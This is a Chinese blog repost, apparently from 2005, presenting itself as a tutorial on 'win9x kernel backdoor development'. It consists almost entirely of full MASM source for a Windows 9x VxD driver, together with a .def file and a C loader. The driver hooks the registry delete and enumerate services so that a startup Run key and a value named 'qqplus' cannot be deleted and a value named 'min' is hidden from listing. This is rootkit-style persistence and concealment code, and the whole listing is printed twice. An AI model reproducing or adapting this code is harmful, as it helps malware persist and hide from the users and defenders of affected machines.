win9x内核后门开发技术之注册表保护
2005-06-11 22:56
483 查看
作者:czy
www.chinansl.com/czy/reg.rar
驱动加载文件代码在最后
win9x内核后门开发技术之注册表保护
czy82于03.06
;在f-king这儿第一次发出来,其实在隐藏注册表键值这儿还是有小问题
;注册表保护操作,隐藏注册表键值,保护特殊键值,主键不被删除
;开发环境98ddk,masm6.1
.386p
.XLIST
INCLUDE VMM.Inc
INCLUDE ../../inc/win98/vwin32.inc
include ../../inc/win98/vmmreg.inc
INCLUDE Shell.Inc
.LIST
;VxD声明
Declare_Virtual_Device REG,1,0,VxD_Control,Undefined_Device_ID,UNDEFINED_INIT_ORDER
VxD_LOCKED_DATA_SEG
RealRegDELKey dd 0
RealRegDELvalue dd 0
RealRegEnumvalue dd 0
pPrevHookEnumKey dd 0
szvalue dd 0h
RetAddr dd 0h
Retvalue dd 0h
VxD_LOCKED_DATA_ENDS
VxD_PAGEABLE_DATA_SEG
MsgTitle db "VxD MessageBox",0
open db "open this key",0
PathName db "Software/Microsoft/Windows/CurrentVersion/Run",0
valueName db "qqplus",0
openpath db 0
sKeyNameForEnum db "czy",0
VxD_PAGEABLE_DATA_ENDS
VxD_CODE_SEG
;系统控制过程
BeginProc VxD_Control
Control_Dispatch W32_DEVICEIOCONTROL,VxD_IOCTL
clc
ret
EndProc VxD_Control
BeginProc HookRegDELKey, service, hook_proc, RealRegDELKey, locked
ArgVar hkey, DWORD
ArgVar lpszSubKey, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 PathName, dword ptr [lpszSubKey]>
cmp eax, 0
jne @@notmykey
LeaveProc
Return
@@notmykey:
LeaveProc
jmp [RealRegDELKey]
Return
EndProc HookRegDELKey
BeginProc HookRegDELvalue, service, hook_proc, RealRegDELvalue, locked
ArgVar hkey, DWORD
ArgVar lpszvalue, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 valueName, dword ptr [lpszvalue]>
cmp eax, 0
jne @@notmyvalue
LeaveProc
Return
@@notmyvalue:
LeaveProc
jmp [RealRegDELvalue]
Return
EndProc HookRegDELvalue
;---------------------------------
BeginProc HookRegEnumvalue, service, hook_proc, RealRegEnumvalue, locked
ArgVar hkey, DWORD
ArgVar ivalue, DWORD
ArgVar lpszvalue,DWORD
ArgVar lpcbvalueName,DWORD
ArgVar lpdwReserved,DWORD
ArgVar lpdwType,DWORD
ArgVar lpbData,DWORD
ArgVar lpcbData,DWORD
EnterProc
mov eax,lpszvalue
mov szvalue,eax
LeaveProc
mov eax,[esp]
mov RetAddr,eax
mov [esp],offset32 @@checkit
jmp [RealRegEnumvalue]
@@checkit:
push eax
pop Retvalue
mov eax,szvalue
cmp dword ptr [eax],006e696dh //键值名叫min则隐藏
jz @@hide
@@exit: cmp eax,ERROR_NO_MORE_ITEMS
jz @@gonow
cmp Retvalue,ERROR_NO_MORE_ITEMS
jz @@gonow
xor eax,eax
@@gonow:
jmp [RetAddr]
@@hide: push eax
EnterProc
inc ivalue
LeaveProc
pop eax
call [RealRegEnumvalue]
jmp @@exit
EndProc HookRegEnumvalue
;---------------------------------
BeginProc VxD_IOCTL
mov ecx,[esi.dwIoControlCode]
cmp ecx,1
jz Install_hook
cmp ecx,2
jz Uninstall_hook
jmp VxD_IOCTL_Exit
Install_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey ;保护主键
mov esi, OFFSET32 HookRegDELKey
VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall Hook_Device_Service
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Hook_Device_Service
jmp VxD_IOCTL_Exit
Uninstall_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey
mov esi, OFFSET32 HookRegDELKey
VMMCall Unhook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall UnHook_Device_Service
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall UnHook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Unhook_Device_Service
VxD_IOCTL_Exit:
xor eax,eax
clc
ret
EndProc VxD_IOCTL
VxD_CODE_ENDS
end
;----------------下面是def文件
VXD REG DYNAMIC
DESCRIPTION 'register API Hook Program'
SEGMENTS
_LPTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TLS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_BSS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LMSGTABLE CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_LMSGDATA CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_IMSGTABLE CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_IMSGDATA CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PMSGTABLE CLASS 'MCODE' NONDISCARDABLE IOPL
_PMSGDATA CLASS 'MCODE' NONDISCARDABLE IOPL
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_16ICODE CLASS '16ICODE' PRELOAD DISCARDABLE
_RCODE CLASS 'RCODE'
EXPORTS
REG_DDB @1
;-----------------load.exe的代码
#include "tchar.h"
#include "windows.h"
#define INSTALL_FILE_SYSTEM_API_HOOK 1
#define UNINSTALL_FILE_SYSTEM_API_HOOK 2
static HANDLE hDevice;
static TCHAR szAppName[]=_T("FHTEST");
static TCHAR szAppTitle[]=_T("拦截Windows 95/98文件操作测试程序");
LRESULT CALLBACK WndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE
hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
HWND hWnd;
WNDCLASSEX wcex;
MSG Msg;
//本程序不能在Windows NT中运行
if(GetVersion()<0x80000000)
{
MessageBox(NULL,_T("本程序不能在Windows NT中运行!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
return FALSE;
}
if(!hPrevInstance)
{
wcex.cbSize=sizeof(WNDCLASSEX);
wcex.style=CS_HREDRAW|CS_VREDRAW;
wcex.lpfnWndProc=WndProc;
wcex.cbClsExtra=0;
wcex.cbWndExtra=0;
wcex.hInstance=hInstance;
wcex.hIcon=LoadIcon(hInstance,IDI_APPLICATION);
wcex.hCursor=LoadCursor(NULL,IDC_ARROW);
wcex.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName=NULL;
wcex.lpszClassName=szAppName;
wcex.hIconSm=LoadIcon(hInstance,IDI_APPLICATION);
if(!RegisterClassEx(&wcex)) return FALSE;
}
hWnd=CreateWindow(szAppName,szAppTitle,WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,0,0,hInstance,NULL);
if(!hWnd) return FALSE;
ShowWindow(hWnd,nCmdShow);
UpdateWindow(hWnd);
while(GetMessage(&Msg,0,0,0))
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam)
{
HDC hDC;
PAINTSTRUCT ps;
DWORD cb;
BOOL bResult;
switch(Message)
{
case WM_CREATE:
hDevice=CreateFile("////.//REG.VXD",0,0,NULL,0,FILE_FLAG_DELETE_ON_CLOSE,NULL);
if(hDevice!=INVALID_HANDLE_VALUE)
{
bResult=DeviceIoControl(hDevice,INSTALL_FILE_SYSTEM_API_HOOK,NULL,0,NULL,0,&cb,0);
if(bResult) MessageBox(hWnd,_T("文件系统API 钩子安装成功!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
else MessageBox(hWnd,_T("不能安装文件系统API 钩子!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
}
else
{
MessageBox(hWnd,_T("不能打开REG.VXD!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
}
break;
case WM_PAINT:
hDC=BeginPaint(hWnd,&ps);
EndPaint(hWnd,&ps);
break;
case WM_DESTROY:
if(hDevice!=INVALID_HANDLE_VALUE)
{
bResult=DeviceIoControl(hDevice,UNINSTALL_FILE_SYSTEM_API_HOOK,NULL,0,NULL,0,&cb,0);
if(bResult) MessageBox(hWnd,_T("文件系统API 钩子移去成功!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
else MessageBox(hWnd,_T("不能移去文件系统API 钩子!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
CloseHandle(hDevice);
}
else
{
MessageBox(hWnd,_T("REG.VXD!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
}
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,Message,wParam,lParam);
}
return 0;
}
www.chinansl.com/czy/reg.rar
驱动加载文件代码在最后
win9x内核后门开发技术之注册表保护
czy82于03.06
;在f-king这儿第一次发出来,其实在隐藏注册表键值这儿还是有小问题
;注册表保护操作,隐藏注册表键值,保护特殊键值,主键不被删除
;开发环境98ddk,masm6.1
.386p
.XLIST
INCLUDE VMM.Inc
INCLUDE ../../inc/win98/vwin32.inc
include ../../inc/win98/vmmreg.inc
INCLUDE Shell.Inc
.LIST
;VxD声明
Declare_Virtual_Device REG,1,0,VxD_Control,Undefined_Device_ID,UNDEFINED_INIT_ORDER
VxD_LOCKED_DATA_SEG
RealRegDELKey dd 0
RealRegDELvalue dd 0
RealRegEnumvalue dd 0
pPrevHookEnumKey dd 0
szvalue dd 0h
RetAddr dd 0h
Retvalue dd 0h
VxD_LOCKED_DATA_ENDS
VxD_PAGEABLE_DATA_SEG
MsgTitle db "VxD MessageBox",0
open db "open this key",0
PathName db "Software/Microsoft/Windows/CurrentVersion/Run",0
valueName db "qqplus",0
openpath db 0
sKeyNameForEnum db "czy",0
VxD_PAGEABLE_DATA_ENDS
VxD_CODE_SEG
;系统控制过程
BeginProc VxD_Control
Control_Dispatch W32_DEVICEIOCONTROL,VxD_IOCTL
clc
ret
EndProc VxD_Control
BeginProc HookRegDELKey, service, hook_proc, RealRegDELKey, locked
ArgVar hkey, DWORD
ArgVar lpszSubKey, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 PathName, dword ptr [lpszSubKey]>
cmp eax, 0
jne @@notmykey
LeaveProc
Return
@@notmykey:
LeaveProc
jmp [RealRegDELKey]
Return
EndProc HookRegDELKey
BeginProc HookRegDELvalue, service, hook_proc, RealRegDELvalue, locked
ArgVar hkey, DWORD
ArgVar lpszvalue, DWORD
EnterProc
VMMCall _lstrcmpi, <OFFSET32 valueName, dword ptr [lpszvalue]>
cmp eax, 0
jne @@notmyvalue
LeaveProc
Return
@@notmyvalue:
LeaveProc
jmp [RealRegDELvalue]
Return
EndProc HookRegDELvalue
;---------------------------------
BeginProc HookRegEnumvalue, service, hook_proc, RealRegEnumvalue, locked
ArgVar hkey, DWORD
ArgVar ivalue, DWORD
ArgVar lpszvalue,DWORD
ArgVar lpcbvalueName,DWORD
ArgVar lpdwReserved,DWORD
ArgVar lpdwType,DWORD
ArgVar lpbData,DWORD
ArgVar lpcbData,DWORD
EnterProc
mov eax,lpszvalue
mov szvalue,eax
LeaveProc
mov eax,[esp]
mov RetAddr,eax
mov [esp],offset32 @@checkit
jmp [RealRegEnumvalue]
@@checkit:
push eax
pop Retvalue
mov eax,szvalue
cmp dword ptr [eax],006e696dh //键值名叫min则隐藏
jz @@hide
@@exit: cmp eax,ERROR_NO_MORE_ITEMS
jz @@gonow
cmp Retvalue,ERROR_NO_MORE_ITEMS
jz @@gonow
xor eax,eax
@@gonow:
jmp [RetAddr]
@@hide: push eax
EnterProc
inc ivalue
LeaveProc
pop eax
call [RealRegEnumvalue]
jmp @@exit
EndProc HookRegEnumvalue
;---------------------------------
BeginProc VxD_IOCTL
mov ecx,[esi.dwIoControlCode]
cmp ecx,1
jz Install_hook
cmp ecx,2
jz Uninstall_hook
jmp VxD_IOCTL_Exit
Install_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey ;保护主键
mov esi, OFFSET32 HookRegDELKey
VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall Hook_Device_Service
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall Hook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Hook_Device_Service
jmp VxD_IOCTL_Exit
Uninstall_hook:
GetVxdServiceOrdinal eax, _RegDeleteKey
mov esi, OFFSET32 HookRegDELKey
VMMCall Unhook_Device_Service
GetVxdServiceOrdinal eax, _RegEnumvalue
mov esi, OFFSET32 HookRegEnumvalue
VMMCall UnHook_Device_Service
;GetVxdServiceOrdinal eax, _RegEnumKey
;mov esi, OFFSET32 RegEnumKey_Hook
;VMMCall UnHook_Device_Service
GetVxdServiceOrdinal eax, _RegDeletevalue
mov esi, OFFSET32 HookRegDELvalue
VMMCall Unhook_Device_Service
VxD_IOCTL_Exit:
xor eax,eax
clc
ret
EndProc VxD_IOCTL
VxD_CODE_ENDS
end
;----------------下面是def文件
VXD REG DYNAMIC
DESCRIPTION 'register API Hook Program'
SEGMENTS
_LPTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE
_DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE
CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE
_TLS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_BSS CLASS 'LCODE' PRELOAD NONDISCARDABLE
_LMSGTABLE CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_LMSGDATA CLASS 'MCODE' PRELOAD NONDISCARDABLE IOPL
_IMSGTABLE CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_IMSGDATA CLASS 'MCODE' PRELOAD DISCARDABLE IOPL
_ITEXT CLASS 'ICODE' DISCARDABLE
_IDATA CLASS 'ICODE' DISCARDABLE
_PTEXT CLASS 'PCODE' NONDISCARDABLE
_PMSGTABLE CLASS 'MCODE' NONDISCARDABLE IOPL
_PMSGDATA CLASS 'MCODE' NONDISCARDABLE IOPL
_PDATA CLASS 'PDATA' NONDISCARDABLE SHARED
_STEXT CLASS 'SCODE' RESIDENT
_SDATA CLASS 'SCODE' RESIDENT
_DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
_16ICODE CLASS '16ICODE' PRELOAD DISCARDABLE
_RCODE CLASS 'RCODE'
EXPORTS
REG_DDB @1
;-----------------load.exe的代码
#include "tchar.h"
#include "windows.h"
#define INSTALL_FILE_SYSTEM_API_HOOK 1
#define UNINSTALL_FILE_SYSTEM_API_HOOK 2
static HANDLE hDevice;
static TCHAR szAppName[]=_T("FHTEST");
static TCHAR szAppTitle[]=_T("拦截Windows 95/98文件操作测试程序");
LRESULT CALLBACK WndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE
hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
HWND hWnd;
WNDCLASSEX wcex;
MSG Msg;
//本程序不能在Windows NT中运行
if(GetVersion()<0x80000000)
{
MessageBox(NULL,_T("本程序不能在Windows NT中运行!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
return FALSE;
}
if(!hPrevInstance)
{
wcex.cbSize=sizeof(WNDCLASSEX);
wcex.style=CS_HREDRAW|CS_VREDRAW;
wcex.lpfnWndProc=WndProc;
wcex.cbClsExtra=0;
wcex.cbWndExtra=0;
wcex.hInstance=hInstance;
wcex.hIcon=LoadIcon(hInstance,IDI_APPLICATION);
wcex.hCursor=LoadCursor(NULL,IDC_ARROW);
wcex.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName=NULL;
wcex.lpszClassName=szAppName;
wcex.hIconSm=LoadIcon(hInstance,IDI_APPLICATION);
if(!RegisterClassEx(&wcex)) return FALSE;
}
hWnd=CreateWindow(szAppName,szAppTitle,WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,0,0,hInstance,NULL);
if(!hWnd) return FALSE;
ShowWindow(hWnd,nCmdShow);
UpdateWindow(hWnd);
while(GetMessage(&Msg,0,0,0))
{
TranslateMessage(&Msg);
DispatchMessage(&Msg);
}
return Msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam)
{
HDC hDC;
PAINTSTRUCT ps;
DWORD cb;
BOOL bResult;
switch(Message)
{
case WM_CREATE:
hDevice=CreateFile("////.//REG.VXD",0,0,NULL,0,FILE_FLAG_DELETE_ON_CLOSE,NULL);
if(hDevice!=INVALID_HANDLE_VALUE)
{
bResult=DeviceIoControl(hDevice,INSTALL_FILE_SYSTEM_API_HOOK,NULL,0,NULL,0,&cb,0);
if(bResult) MessageBox(hWnd,_T("文件系统API 钩子安装成功!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
else MessageBox(hWnd,_T("不能安装文件系统API 钩子!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
}
else
{
MessageBox(hWnd,_T("不能打开REG.VXD!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
}
break;
case WM_PAINT:
hDC=BeginPaint(hWnd,&ps);
EndPaint(hWnd,&ps);
break;
case WM_DESTROY:
if(hDevice!=INVALID_HANDLE_VALUE)
{
bResult=DeviceIoControl(hDevice,UNINSTALL_FILE_SYSTEM_API_HOOK,NULL,0,NULL,0,&cb,0);
if(bResult) MessageBox(hWnd,_T("文件系统API 钩子移去成功!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
else MessageBox(hWnd,_T("不能移去文件系统API 钩子!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
CloseHandle(hDevice);
}
else
{
MessageBox(hWnd,_T("REG.VXD!"),szAppTitle,MB_ICONINFORMATION|MB_OK);
}
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,Message,wParam,lParam);
}
return 0;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 腾讯后台开发技术总监浅谈过载保护 小心雪崩效应
- Linux驱动程序开发 005- 内核同步技术
- 用Visual studio11在Windows8上开发内核驱动隐藏注册表
- [代码实例][Linux内核编程]内核开发:1、从实模式到保护模式
- 基于Windows8与Visual Studio2012开发内核隐藏注册表
- 腾讯后台开发技术总监浅谈过载保护 小心雪崩效应
- java开发系统内核:使用LDT保护进程数据和代码
- Windows驱动开发(5) - 内核模式下的注册表操作
- Linux驱动程序开发 006- 内核同步技术
- 微信小程序开发需要了解的三个内核技术
- 基于Windows8与Visual Studio2012开发内核隐藏注册表
- 内核态下基于动态感染技术的应用程序执行保护(四 Hook SSDT)
- 内核态下基于动态感染技术的应用程序执行保护(三 获取SSDT)
- 开发 linux内核的技术路线
- 内核态下基于动态感染技术的应用程序执行保护
- 微信小程序开发需要了解的三个内核技术
- Linux内核开发技术今日推荐:
- 内核开发之:使用图片分层技术实现窗口叠加
- Linux驱动程序开发005 - 内核同步技术
- 内核态下基于动态感染技术的应用程序执行保护(一 前言)